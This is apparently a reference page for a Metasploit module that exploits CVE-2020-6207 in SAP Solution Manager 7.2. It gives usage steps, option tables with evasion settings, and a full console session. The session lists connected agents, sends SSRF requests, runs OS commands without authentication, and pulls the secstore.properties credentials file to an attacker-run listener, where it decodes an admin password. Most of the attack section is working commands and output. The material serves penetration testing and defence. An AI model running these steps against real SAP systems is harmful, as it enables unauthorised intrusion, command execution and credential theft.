SAP Solution Manager remote unauthorized OS commands execution - Metasploit
This page contains detailed information about how to use the auxiliary/admin/sap/cve_2020_6207_solman_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SAP Solution Manager remote unauthorized OS commands execution
Module: auxiliary/admin/sap/cve_2020_6207_solman_rce
Source code: modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
Disclosure date: 2020-10-03
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 50000
List of CVEs: CVE-2020-6207
This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/sap/cve_2020_6207_solman_rce
msf auxiliary(cve_2020_6207_solman_rce) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
If a connected SMDAgent is also vulnerable to CVE-2019-0307, unauthenticated remote attackers can obtain its secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
CVE-2019-0307 vulnerability paper: The Agent Who Spoke Too Much
CVE-2020-6207 vulnerability paper: An Unauthenticated Journey to Root
Application Background
In SAP landscapes, SolMan could be compared to a domain controller system in the Microsoft world. It is a technical system that is tightly connected to all other SAP systems with high privileges. Once an SAP system is connected to the solution manager, it receives the name of a "managed" or "satellite" system. As an administration solution, SolMan is intended to centralize the management of all systems within the landscape by performing actions such as implementing, supporting, monitoring and maintaining the enterprise solutions.
Installation Steps
Steps to install, configure and manage SolMan can be found online at this page.
Once set up and configured, the instances will be vulnerable on the default HTTP port 50000.
Verification Steps
- Start msfconsole
- Do:
workspace [WORKSPACE]
- Do:
use auxiliary/admin/sap/sap_2020_6207_solman_rce
- Do:
set RHOSTS [IP]
- Do:
set action LIST
- Do:
run
- Verify that a list of connected agents was returned.
- Do:
set AGENT [Connected agent server name]
- Do:
set SSRF_METHOD [GET, POST, PUT, DELETE, PATCH, ...]
- Do:
set SSRF_URI [SSRF uri, example - http://1.1.1.1/test.html]
- Do:
set action SSRF
- Do:
run
- Verify that the HTTP request from the connected agent has been sent.
- Do:
set AGENT [Connected agent server name]
- Do:
set COMMAND [OS command, example - ping -c 4 1.1.1.1]
- Do:
set action EXEC
- Do:
run
- Verify that the OS command has been executed on the connected agent.
- Do:
set AGENT [Connected agent server name]
- Do:
set SRVHOST [Local IP]
- Do:
set action SECSTORE
- Do:
run
- Verify that the credentials for Solution Manager have been obtained.
Options
TARGETURI
This is the path to the EEM admin page of the SolMan that is vulnerable to CVE-2020-6207.
By default, it is set to /EemAdminService/EemAdmin
. However, it can be changed if SolMan
was installed at a path different from that of the web root. For example, if the SolMan
server was proxied to the /solman/
path under the web root, then this value would be
set to /solman/EemAdminService/EemAdmin
.
AGENT
Connected agent sever name.
Example: linux_agent
SSRF_METHOD
HTTP method for sending HTTP request from a connected agent, the server name of which is specified in the AGENT
option.
Example: GET
SSRF_URI
URI for sending HTTP requests from a connected agent, the server name of which is specified in the AGENT
option.
Example: http://1.1.1.1/test.html
COMMAND
OS command for executing in connected agent, the server name of which is specified in the AGENT
option.
Example: ping -c 4 1.1.1.1
Actions
Name Description
---- -----------
EXEC Exec OS command on connected agent
LIST List connected agents
SECSTORE Get file with SolMan credentials from connected agent
SSRF Send SSRF from connected agent
Scenarios
Vulnerable SolMan 7.2 running on agent: test_linux with OS: Linux and java version: 1.8
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/cve_2020_6207_solman_rce
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION LIST
ACTION => LIST
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set RHOST 172.16.30.46
RHOST => 172.16.30.46
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Getting a list of agents connected to the Solution Manager: 172.16.30.46
[+] Successfully retrieved agent list:
Connected Agents List
=====================
Server Name Host Name Instance Name OS Name Java Version
----------- --------- ------------- ------- ------------
test_windows sap731.corp.test.com SMDA97 Windows Server 2008 R2 1.6.0_29
test_linux saperp7.corp.test.com SMDA98 Linux 1.8.0_25
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SSRF
ACTION => SSRF
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_METHOD PUT
SSRF_METHOD => PUT
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_URI http://192.168.50.3:7777/
SSRF_URI => http://192.168.50.3:7777/
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Enable EEM on agent: test_linux
[*] Start script: IqsDdgpc5Iwu with SSRF payload on agent: test_linux
[*] Stop script: IqsDdgpc5Iwu on agent: test_linux
[*] Delete script: IqsDdgpc5Iwu on agent: test_linux
[+] Send SSRF: 'PUT http://192.168.50.3:7777/ HTTP/1.1' from agent: test_linux
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION EXEC
ACTION => EXEC
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set COMMAND ping -c 4 192.168.50.3
COMMAND => ping -c 4 192.168.50.3
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Enable EEM on agent: test_linux
[*] Start script: Lu5BnHgzVehn with RCE payload on agent: test_linux
[*] Stop script: Lu5BnHgzVehn on agent: test_linux
[*] Delete script: Lu5BnHgzVehn on agent: test_linux
[+] Execution command: 'ping -c 4 192.168.50.3' on agent: test_linux
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SECSTORE
ACTION => SECSTORE
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SRVHOST 192.168.50.3
SRVHOST => 192.168.50.3
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46
[*] Enable EEM on agent: test_linux
[*] Using URL: http://192.168.50.3:8000/ginMlA2izrNi
[*] Start script: ginMlA2izrNi with payload for retrieving SolMan credentials file from agent: test_linux
[*] Received HTTP request from agent test_linux - 172.16.30.14
[+] Successfully retrieved file /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties from agent: test_linux saved in: /Users/vladimir/.msf4/loot/20210327204344_SAP_TEST_172.16.30.14_smdagent.secstor_025841.txt
[+] Successfully encoded credentials for SolMan server: 172.16.30.46:50000 from agent: test_linux - 172.16.30.14
[+] SMD Username: j2ee_admin
[+] SMD Password: asdQWE123
[*] Stop script: ginMlA2izrNi on agent: test_linux
[*] Delete script: ginMlA2izrNi on agent: test_linux
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.16.30.46 172.16.30.46 50000/tcp (soap) j2ee_admin asdQWE123 Password
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.46 50000 tcp soap open SAP Solution Manager
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2021-03-27 17:49:37 UTC 172.16.30.46 SAP Solution Manager remote unauthorized OS commands execution CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207
2021-03-27 17:49:41 UTC 172.16.30.14 Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.14 smdagent.secstore.properties /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties text/plain SMD Agent secstore.properties file /Users/vladimir/.msf4/loot/a228e5f820edc34bc767-20210327204941_SAP_TEST_172.16.30.14_smdagent.secstor_283920.txt
Go back to menu.
Msfconsole Usage
Here is how the admin/sap/cve_2020_6207_solman_rce auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/sap/cve_2020_6207_solman_rce
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > show info
Name: SAP Solution Manager remote unauthorized OS commands execution
Module: auxiliary/admin/sap/cve_2020_6207_solman_rce
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-10-03
Provided by:
Yvan Genuer
Pablo Artuso
Dmitry Chastuhin
Vladimir Ivanov
Available actions:
Name Description
---- -----------
EXEC Exec OS command on connected agent
LIST List connected agents
SECSTORE Get file with SolMan credentials from connected agent
SSRF Send SSRF from connected agent
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 50000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /EemAdminService/EemAdmin yes Path to the SAP Solution Manager EemAdmin page from the web root
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Description:
This module exploits the CVE-2020-6207 vulnerability within the SAP
EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager
(SolMan) running version 7.2. The vulnerability occurs due to
missing authentication checks when submitting SOAP requests to the
/EemAdminService/EemAdmin page to get information about connected
SMDAgents, send HTTP request (SSRF), and execute OS commands on
connected SMDAgent. Works stable in connected SMDAgent with Java
version 1.8. Successful exploitation of the vulnerability enables
unauthenticated remote attackers to achieve SSRF and execute OS
commands from the agent connected to SolMan as a user from which the
SMDAgent service starts, usually the daaadm.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-6207
https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
https://github.com/chipik/SAP_EEM_CVE-2020-6207
Module Options
This is a complete list of options available in the admin/sap/cve_2020_6207_solman_rce auxiliary module:
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > show options
Module options (auxiliary/admin/sap/cve_2020_6207_solman_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 50000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /EemAdminService/EemAdmin yes Path to the SAP Solution Manager EemAdmin page from the web root
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
LIST List connected agents
Advanced Options
Here is a complete list of advanced options supported by the admin/sap/cve_2020_6207_solman_rce auxiliary module:
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > show advanced
Module advanced options (auxiliary/admin/sap/cve_2020_6207_solman_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/sap/cve_2020_6207_solman_rce module can do:
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > show actions
Auxiliary actions:
Name Description
---- -----------
EXEC Exec OS command on connected agent
LIST List connected agents
SECSTORE Get file with SolMan credentials from connected agent
SSRF Send SSRF from connected agent
Evasion Options
Here is the full list of possible evasion options supported by the admin/sap/cve_2020_6207_solman_rce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Failed to retrieve secstore.properties file from agent <AGENT_NAME>.
- The agent: <AGENT_NAME> sent a secstore.properties file, but this file is likely encrypted or does not contain credentials. The agent: <AGENT_NAME> is likely patched.
- The action <ACTION.NAME> is not a supported action.
- Failed to retrieve or decode SolMan credentials file from agent: <AGENT_NAME>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to retrieve secstore.properties file from agent <AGENT_NAME>.
Here is a relevant code snippet related to the "Failed to retrieve secstore.properties file from agent <AGENT_NAME>." error message:
114: request_uri = request.raw_uri
115: secstore_content = request.body
116: secstore_filename = request.headers['X-File-Name']
117:
118: if secstore_content.nil? || secstore_filename.nil? || agent_host.nil? || request_uri.nil? || request_uri != "/#{@script_name}"
119: fail_with(Failure::PayloadFailed, "Failed to retrieve secstore.properties file from agent #{@agent_name}.")
120: end
121: print_status("Received HTTP request from agent #{@agent_name} - #{agent_host}")
122:
123: # Loot secstore.properties file
124: loot = store_loot('smdagent.secstore.properties', 'text/plain', agent_host, secstore_content, secstore_filename, 'SMD Agent secstore.properties file')
The agent: <AGENT_NAME> sent a secstore.properties file, but this file is likely encrypted or does not contain credentials. The agent: <AGENT_NAME> is likely patched.
Here is a relevant code snippet related to the "The agent: <AGENT_NAME> sent a secstore.properties file, but this file is likely encrypted or does not contain credentials. The agent: <AGENT_NAME> is likely patched." error message:
136: end
137: end
138:
139: # Store decoded credentials and report vulnerability
140: if @username.nil? || @password.nil?
141: fail_with(Failure::NotVulnerable, "The agent: #{@agent_name} sent a secstore.properties file, but this file is likely encrypted or does not contain credentials. The agent: #{@agent_name} is likely patched.")
142: else
143: # Store decoded credentials
144: print_good("Successfully encoded credentials for SolMan server: #{@host}:#{@port} from agent: #{@agent_name} - #{agent_host}")
145: print_good("SMD username: #{@username}")
146: print_good("SMD password: #{@password}")
The action <ACTION.NAME> is not a supported action.
Here is a relevant code snippet related to the "The action <ACTION.NAME> is not a supported action." error message:
180: when 'EXEC'
181: action_exec
182: when 'SECSTORE'
183: action_secstore
184: else
185: print_error("The action #{action.name} is not a supported action.")
186: end
187: end
188:
189: def action_list
190: print_status("Getting a list of agents connected to the Solution Manager: #{@host}")
Failed to retrieve or decode SolMan credentials file from agent: <AGENT_NAME>
Here is a relevant code snippet related to the "Failed to retrieve or decode SolMan credentials file from agent: <AGENT_NAME>" error message:
260:
261: print_status("Delete script: #{@script_name} on agent: #{@agent_name}")
262: delete_script_in_agent(@agent_name, @script_name)
263:
264: report_service_and_vuln
265: if @username.nil? && @password.nil?
266: print_error("Failed to retrieve or decode SolMan credentials file from agent: #{@agent_name}")
267: end
268: end
269:
270: end
Go back to menu.
Related Pull Requests
References
- CVE-2020-6207
- https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
- https://github.com/chipik/SAP_EEM_CVE-2020-6207
See Also
Check also the following modules related to this module:
- auxiliary/admin/sap/cve_2020_6287_ws_add_user
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/admin/sap/sap_igs_xmlchart_xxe
- auxiliary/admin/sap/sap_mgmt_con_osexec
- auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
- auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
- auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
- auxiliary/scanner/sap/sap_icf_public_info
- auxiliary/scanner/sap/sap_icm_urlscan
- auxiliary/scanner/sap/sap_mgmt_con_abaplog
- auxiliary/scanner/sap/sap_mgmt_con_brute_login
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
- auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
- auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
- auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
- auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_startprofile
- auxiliary/scanner/sap/sap_mgmt_con_version
- auxiliary/scanner/sap/sap_router_info_request
- auxiliary/scanner/sap/sap_router_portscanner
- auxiliary/scanner/sap/sap_service_discovery
- auxiliary/scanner/sap/sap_smb_relay
- auxiliary/scanner/sap/sap_soap_bapi_user_create1
- auxiliary/scanner/sap/sap_soap_rfc_brute_login
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
- auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
- auxiliary/scanner/sap/sap_soap_rfc_ping
- auxiliary/scanner/sap/sap_soap_rfc_read_table
- auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
- auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_system_info
- auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
- auxiliary/scanner/sap/sap_web_gui_brute_login
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/multi/sap/sap_mgmt_con_osexec_payload
- exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
- exploit/multi/sap/sap_soap_rfc_sxpg_command_exec
- post/multi/sap/smdagent_get_properties
- auxiliary/admin/dcerpc/cve_2020_1472_zerologon
- auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/scanner/rdp/cve_2019_0708_bluekeep
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
- auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
- auxiliary/admin/android/google_play_store_uxss_xframe_rce
- auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
- auxiliary/admin/http/iomega_storcenterpro_sessionid
- auxiliary/dos/cisco/ios_http_percentpercent
- auxiliary/gather/citrix_published_bruteforce
- auxiliary/gather/nuuo_cms_bruteforce
- auxiliary/scanner/dcerpc/dfscoerce
- auxiliary/scanner/http/apache_activemq_source_disclosure
- auxiliary/scanner/http/caidao_bruteforce_login
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/joomla_bruteforce_login
- auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner
- auxiliary/scanner/http/litespeed_source_disclosure
- auxiliary/scanner/http/nginx_source_disclosure
- auxiliary/scanner/http/typo3_bruteforce
Related Nessus plugins:
Authors
- Yvan Genuer
- Pablo Artuso
- Dmitry Chastuhin
- Vladimir Ivanov
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.